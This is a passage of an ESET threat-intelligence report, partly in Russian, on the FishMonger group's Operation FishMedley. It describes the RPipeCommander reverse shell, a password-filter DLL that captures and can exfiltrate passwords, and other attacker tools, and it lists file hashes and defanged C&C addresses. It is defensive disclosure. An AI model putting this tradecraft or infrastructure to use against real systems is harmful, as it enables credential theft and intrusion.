width=\"438\"><span>MIGJAoGBAJ0EsHDp5vtk23KCxEq0tAocvMwn63vCqq0FVmXsY+fvD0tP6N<wbr><\/wbr>lc7k0lESpB4wGioj2xuhQgcEjXEkYAIPGiefYFovxMPVuzp1FsutZa5SD6<wbr><\/wbr>+4NcTRKsRsrMTZm5tFRuuENoEVmOSy3XoAS00mu4MM5tt7KKDlaczzhYJi<wbr><\/wbr>21PGk5AgMBAAE=<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/span><\/h4>\n<h4>RPipeCommander<\/h4>\n<p>At Victim D, we captured a previously unknown implant in the same process where Spyder was running. It was probably loaded from disk or downloaded by Spyder. Because its DLL export name was <span>rcmd64.dll<\/span>, we named this implant RPipeCommander.<\/p>\n<p>RPipeCommander is multithreaded and uses <span>IoCompletionPort<\/span> to manage the I\/O requests of the multiple threads. It creates the named pipe <span>\\.PipeCmdPipe&lt;PID&gt;<\/span>, where <span>&lt;PID&gt;<\/span> is the current process ID, and reads from and writes into this pipe.<\/p>\n<p>RPipeCommander is a reverse shell that accepts three commands via the named pipe:<\/p>\n<ul>\n<li><span>h<\/span> (<span>0x68<\/span>): \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043f\u0440\u043e\u0446\u0435\u0441\u0441 <span>cmd.exe<\/span> \u0438 \u043f\u0440\u0438\u0432\u044f\u0437\u0430\u0442\u044c \u043a \u043d\u0435\u043c\u0443 \u043f\u0430\u0439\u043f\u044b \u0434\u043b\u044f \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u043a\u043e\u043c\u0430\u043d\u0434 \u0438 \u0447\u0442\u0435\u043d\u0438\u044f \u0432\u044b\u0432\u043e\u0434\u0430.<\/li>\n<li><span>i<\/span> (<span>0x69<\/span>): \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0432 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 <span>cmd.exe<\/span> \u0438\u043b\u0438 \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u0432\u044b\u0432\u043e\u0434 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u044b.<\/li>\n<li><span>j<\/span> (<span>0x6A<\/span>): \u0437\u0430\u0432\u0435\u0440\u0448\u0438\u0442\u044c \u043f\u0440\u043e\u0446\u0435\u0441\u0441 <span>cmd.exe<\/span>, \u0437\u0430\u043f\u0438\u0441\u0430\u0432 <span>exitrn<\/span> \u0432 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u0443\u044e \u0441\u0442\u0440\u043e\u043a\u0443.<\/li>\n<\/ul>\n<p>\u0421\u0442\u043e\u0438\u0442 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u043d\u0430\u044f \u0447\u0430\u0441\u0442\u044c RPipeCommander. \u0421\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0432\u0442\u043e\u0440\u043e\u0439 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442, \u043a\u043b\u0438\u0435\u043d\u0442, \u0434\u043b\u044f \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u043a\u043e\u043c\u0430\u043d\u0434 \u0441\u0435\u0440\u0432\u0435\u0440\u0443 \u0441 \u0434\u0440\u0443\u0433\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438.<\/p>\n<p>\u041d\u0430\u043a\u043e\u043d\u0435\u0446, RPipeCommander \u043d\u0430\u043f\u0438\u0441\u0430\u043d \u043d\u0430 C++, \u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f RTTI \u0431\u044b\u043b\u0430 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u0432 \u0437\u0430\u0445\u0432\u0430\u0447\u0435\u043d\u043d\u044b\u0435 \u043e\u0431\u0440\u0430\u0437\u0446\u044b, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u043e \u043d\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u043c\u0435\u043d\u0430 \u043a\u043b\u0430\u0441\u0441\u043e\u0432:<\/p>\n<ul>\n<li><span>CPipeServer<\/span><\/li>\n<li><span>CPipeBuffer<\/span><\/li>\n<li><span>CPipeSrvEvent<\/span><\/li>\n<li><span>CPipeServerEventHandler<\/span><\/li>\n<\/ul>\n<h4>\u0414\u0440\u0443\u0433\u0438\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b<\/h4>\n<p>\u041f\u043e\u043c\u0438\u043c\u043e \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u043e\u0432, \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0445 \u0432\u044b\u0448\u0435, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f \u0441\u0431\u043e\u0440\u0430 \u0438\u043b\u0438 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u044b \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c \u0432 \u0422\u0430\u0431\u043b\u0438\u0446\u0435 7.<\/p>\n<p><em>\u0422\u0430\u0431\u043b\u0438\u0446\u0430 7. \u0414\u0440\u0443\u0433\u0438\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 Operation FishMedley<\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"151\"><strong>\u0418\u043c\u044f \u0444\u0430\u0439\u043b\u0430<\/strong><\/td>\n<td width=\"492\"><strong>\u0414\u0435\u0442\u0430\u043b\u0438<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"151\"><span>C:Windowssystem32<wbr><\/wbr>sasetup.dll<\/span><\/td>\n<td width=\"492\">\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0439 <a href=\"https:\/\/pentestlab.blog\/2020\/02\/10\/credential-access-password-filter-dll\/\">\u0444\u0438\u043b\u044c\u0442\u0440 \u043f\u0430\u0440\u043e\u043b\u0435\u0439<\/a>. \u042d\u043a\u0441\u043f\u043e\u0440\u0442 <span>PasswordChangeNotify<\/span> \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u0440\u0438 \u0441\u043c\u0435\u043d\u0435 \u043f\u0430\u0440\u043e\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c, \u0438 \u043e\u043d \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u043d\u043e\u0432\u044b\u0439 \u043f\u0430\u0440\u043e\u043b\u044c \u043d\u0430 \u0434\u0438\u0441\u043a \u0432 \u0442\u0435\u043a\u0443\u0449\u0435\u043c \u0440\u0430\u0431\u043e\u0447\u0435\u043c \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 \u0432 \u043b\u043e\u0433-\u0444\u0430\u0439\u043b \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c <span>etuper.log<\/span>. \u041e\u0431\u0440\u0430\u0442\u0438\u0442\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0447\u0442\u043e \u043e\u043d \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044f POST-\u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0436\u0435\u0441\u0442\u043a\u043e \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 C&amp;C-\u0441\u0435\u0440\u0432\u0435\u0440 \u0441 <span>flag=&lt;password&gt;<\/span> \u0432 \u0434\u0430\u043d\u043d\u044b\u0445 POST. \u041e\u0434\u043d\u0430\u043a\u043e \u044d\u0442\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u043d\u0435 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u043c \u043e\u0431\u0440\u0430\u0437\u0446\u0435, \u0438 \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u043d\u0435\u0442 C&amp;C-\u0441\u0435\u0440\u0432\u0435\u0440\u0430.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>C:Windowsdebug<wbr><\/wbr>svhost.tmp<\/span><\/td>\n<td width=\"492\">\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u0441\u043a\u0430\u043d\u0435\u0440 fscan, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0439 \u043d\u0430 <a href=\"https:\/\/github.com\/shadow1ng\/fscan\/\">GitHub<\/a>.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>C:nb.exe<\/span><\/td>\n<td width=\"492\"><a href=\"http:\/\/www.unixwiz.net\/tools\/nbtscan.html\">nbtscan<\/a> \u2013 \u0441\u043a\u0430\u043d\u0435\u0440 NetBIOS.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>C:Userspublic<wbr><\/wbr>drop.zip<\/span><\/td>\n<td width=\"492\">\u0421\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0442\u043e\u043b\u044c\u043a\u043e <a href=\"https:\/\/github.com\/dropbox\/dbxcli\/\">dbxcli<\/a> \u2013 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 Go \u0434\u043b\u044f \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 Dropbox. \u0412\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043e\u043d \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438\u0437 \u0441\u0435\u0442\u0438 \u0436\u0435\u0440\u0442\u0432\u044b, \u043d\u043e \u043c\u044b \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043d\u0438\u043a\u0430\u043a\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u0431 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432.<br \/>\u041e\u0431\u0440\u0430\u0442\u0438\u0442\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0447\u0442\u043e, \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435 <span>.zip<\/span>, \u044d\u0442\u043e CAB-\u0444\u0430\u0439\u043b. \u041e\u043d \u0431\u044b\u043b \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0441 <span>http:\/\/45.76.165[.]227\/wECqKe529r.png<\/span>.<br \/>\u0422\u0430\u043a\u0436\u0435 \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0447\u0442\u043e dbxcli, \u043f\u043e\u0445\u043e\u0436\u0435, \u0431\u044b\u043b \u0441\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u043d \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0445\u0435\u0448 (SHA-1: <span>2AD82FFA393937A2353096FE2A2209E0EBC1C9D7<\/span>) \u0438\u043c\u0435\u0435\u0442 \u043e\u0447\u0435\u043d\u044c \u043d\u0438\u0437\u043a\u0443\u044e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>\u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435<\/h2>\n<p>\u0412 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043c\u044b \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0438, \u043a\u0430\u043a FishMonger \u043f\u0440\u043e\u0432\u0435\u043b \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044e \u043f\u0440\u043e\u0442\u0438\u0432 \u0432\u044b\u0441\u043e\u043a\u043e\u043f\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443 \u0438 \u0431\u044b\u043b \u043f\u0440\u0435\u0434\u043c\u0435\u0442\u043e\u043c \u043e\u0431\u0432\u0438\u043d\u0435\u043d\u0438\u044f \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u0430 \u044e\u0441\u0442\u0438\u0446\u0438\u0438 \u0421\u0428\u0410 \u0432 \u043c\u0430\u0440\u0442\u0435 2025 \u0433\u043e\u0434\u0430. \u041c\u044b \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0438, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0430 \u043d\u0435 \u0441\u0442\u0435\u0441\u043d\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u044b, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a ShadowPad \u0438\u043b\u0438 SodaMaster, \u0434\u0430\u0436\u0435 \u0441\u043f\u0443\u0441\u0442\u044f \u0434\u043e\u043b\u0433\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043f\u043e\u0441\u043b\u0435 \u0438\u0445 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u044f. \u041d\u0430\u043a\u043e\u043d\u0435\u0446, \u043c\u044b \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0438, \u0447\u0442\u043e FishMonger \u2014 \u044d\u0442\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u0430, \u0432\u0445\u043e\u0434\u044f\u0449\u0430\u044f \u0432 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0443\u044e \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044e I\u2011SOON.<\/p>\n<blockquote>\n<div><em>\u041f\u043e \u043b\u044e\u0431\u044b\u043c \u0432\u043e\u043f\u0440\u043e\u0441\u0430\u043c, \u043a\u0430\u0441\u0430\u044e\u0449\u0438\u043c\u0441\u044f \u043d\u0430\u0448\u0438\u0445 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0439, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 WeLiveSecurity, \u043f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u0441\u0432\u044f\u0436\u0438\u0442\u0435\u0441\u044c \u0441 \u043d\u0430\u043c\u0438 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 <a href=\"mailto:threatintel@eset.com?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=autotagging&amp;utm_content=eset-research&amp;utm_term=en\">threatintel@eset.com<\/a>. <\/em><\/div>\n<div><em>ESET Research \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u0435\u0442 \u0447\u0430\u0441\u0442\u043d\u044b\u0435 \u043e\u0442\u0447\u0435\u0442\u044b \u043e\u0431 APT-\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0435 \u0438 \u043f\u043e\u0442\u043e\u043a\u0438 \u0434\u0430\u043d\u043d\u044b\u0445. \u041f\u043e \u043b\u044e\u0431\u044b\u043c \u0432\u043e\u043f\u0440\u043e\u0441\u0430\u043c, \u043a\u0430\u0441\u0430\u044e\u0449\u0438\u043c\u0441\u044f \u044d\u0442\u043e\u0439 \u0443\u0441\u043b\u0443\u0433\u0438, \u043f\u043e\u0441\u0435\u0442\u0438\u0442\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=operation-fishmedley&amp;sfdccampaignid=7011n0000017htTAAQ\">ESET Threat Intelligence<\/a>.<\/em><\/div>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<p><em>\u041f\u043e\u043b\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u0432 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 (IoC) \u0438 \u043e\u0431\u0440\u0430\u0437\u0446\u043e\u0432 \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u0432 <a href=\"https:\/\/github.com\/eset\/malware-ioc\/tree\/master\/fishmonger\">\u043d\u0430\u0448\u0435\u043c \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 GitHub<\/a>.<\/em><\/p>\n<h3>\u0424\u0430\u0439\u043b\u044b<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"151\"><strong>\u0418\u043c\u044f \u0444\u0430\u0439\u043b\u0430<\/strong><\/td>\n<td width=\"142\"><strong>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435<\/strong><\/td>\n<td width=\"170\"><strong>\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span>D61A4387466A0C999981<wbr><\/wbr>086C2C994F2A80193CE3<\/span><\/td>\n<td width=\"151\">N\/A<\/td>\n<td width=\"142\">Win32\/Agent.ADVC<\/td>\n<td width=\"170\">\u0414\u0440\u043e\u043f\u043f\u0435\u0440 ShadowPad.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>918DDD842787D64B244D<wbr><\/wbr>353BFC0E14CC037D2D97<\/span><\/td>\n<td width=\"151\"><span>log.dll<\/span><\/td>\n<td width=\"142\">Win32\/Agent.ADVC<\/td>\n<td width=\"170\">\u0417\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a ShadowPad, \u0443\u043f\u0430\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0439 ScatterBee.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>F12C8CEC813257890F48<wbr><\/wbr>56353ABD9F739DEED890<\/span><\/td>\n<td width=\"151\"><span>task.exe<\/span><\/td>\n<td width=\"142\">Win64\/Agent.BEJ<\/td>\n<td width=\"170\">\u0417\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a Spyder.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3630F62771360540B667<wbr><\/wbr>01ABC8F6C868087A6918<\/span><\/td>\n<td width=\"151\"><span>DeElevator64<wbr><\/wbr>.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CU<\/td>\n<td width=\"170\">\u0417\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a SodaMaster.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3C08C694C222E7346BD8<wbr><\/wbr>633461C5D19EAE18B661<\/span><\/td>\n<td width=\"151\"><span>DrsSDK.dll<\/span><\/td>\n<td width=\"142\">Win64\/Agent.CAC<\/td>\n<td width=\"170\">\u0417\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a SodaMaster.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>5401E3EF903AFE981CFC<wbr><\/wbr>2840D5F0EF2F1D83B0BF<\/span><\/td>\n<td width=\"151\"><span>safestore64<wbr><\/wbr>.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CU<\/td>\n<td width=\"170\">\u0417\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a SodaMaster.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>A4F68D0F1C72C3AC9D70<wbr><\/wbr>919C17DC52692C43599E<\/span><\/td>\n<td width=\"151\"><span>libmaxminddb<wbr><\/wbr>-0.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CU<\/td>\n<td width=\"170\">\u0417\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a SodaMaster.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>D8B631C551845F892EBB<wbr><\/wbr>5E7D09991F6C9D4FACAD<\/span><\/td>\n<td width=\"151\"><span>libvlc.dll<\/span><\/td>\n<td width=\"142\">Win64\/Agent.BFZ<\/td>\n<td width=\"170\">\u0417\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a SodaMaster.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3F5F6839C7DCB1D164E4<wbr><\/wbr>813AF2E30E9461AB35C1<\/span><\/td>\n<td width=\"151\"><span>sasetup.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CB<\/td>\n<td width=\"170\">\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0444\u0438\u043b\u044c\u0442\u0440 \u043f\u0430\u0440\u043e\u043b\u0435\u0439.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>\u0421\u0435\u0442\u044c<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"151\"><strong>IP<\/strong><\/td>\n<td width=\"113\"><strong>\u0414\u043e\u043c\u0435\u043d<\/strong><\/td>\n<td width=\"142\"><strong>\u0425\u043e\u0441\u0442\u0438\u043d\u0433-\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440<\/strong><\/td>\n<td width=\"85\"><strong>\u0412\u043f\u0435\u0440\u0432\u044b\u0435 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043e<\/strong><\/td>\n<td width=\"151\"><strong>\u0414\u0435\u0442\u0430\u043b\u0438<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"151\"><span>213.59.118[.]124<\/span><\/td>\n<td width=\"113\"><span>api.googleau<wbr><\/wbr>thenticatoro<wbr><\/wbr>nline[.]com<\/span><\/td>\n<td width=\"142\">STARK INDUSTRIES<\/td>\n<td width=\"85\">2022\u201103\u201120<\/td>\n<td width=\"151\">\u0421\u0435\u0440\u0432\u0435\u0440 C&amp;C ShadowPad.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>61.238.103[.]165<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">IRT-HKBN-HK<\/td>\n<td width=\"85\">2022\u201103\u201110<\/td>\n<td width=\"151\">\u0421\u0435\u0440\u0432\u0435\u0440 C&amp;C Spyder.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>162.33.178[.]23<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">BL Networks<\/td>\n<td width=\"85\">2022\u201103\u201128<\/td>\n<td width=\"151\">\u0421\u0435\u0440\u0432\u0435\u0440 C&amp;C SodaMaster.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>78.141.202[.]70<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">The Constant Company<\/td>\n<td width=\"85\">2022\u201105\u201118<\/td>\n<td width=\"151\">\u0421\u0435\u0440\u0432\u0435\u0440 C&amp;C SodaMaster.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>192.46.223[.]211<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">Akamai Connected Cloud<\/td>\n<td width=\"85\">2022\u201106\u201122<\/td>\n<td width=\"151\">\u0421\u0435\u0440\u0432\u0435\u0440 C&amp;C SodaMaster.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>168.100.10[.]136<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">BL Networks<\/td>\n<td width=\"85\">2022\u201105\u201112<\/td>\n<td width=\"151\">\u0421\u0435\u0440\u0432\u0435\u0440 C&amp;C SodaMaster.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>\u0422\u0435\u0445\u043d\u0438\u043a\u0438 MITRE ATT&amp;CK<\/h2>\n<p><em>\u042d\u0442\u0430 \u0442\u0430\u0431\u043b\u0438\u0446\u0430 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c <a href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">\u0432\u0435\u0440\u0441\u0438\u0438 16<\/a> \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0430 MITRE ATT&amp;CK<strong>.<\/strong><\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"113\"><strong>\u0422\u0430\u043a\u0442\u0438\u043a\u0430<\/strong><\/td>\n<td width=\"113\"><strong>ID<\/strong><\/td>\n<td width=\"151\"><strong>\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435<\/strong><\/td>\n<td width=\"265\"><strong>\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0430 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1583\/004\">T1583.004<\/a><\/td>\n<td width=\"151\">\u041f\u0440\u0438\u043e\u0431\u0440\u0435\u0442\u0435\u043d\u0438\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b: \u0421\u0435\u0440\u0432\u0435\u0440<\/td>\n<td width=\"265\">FishMonger 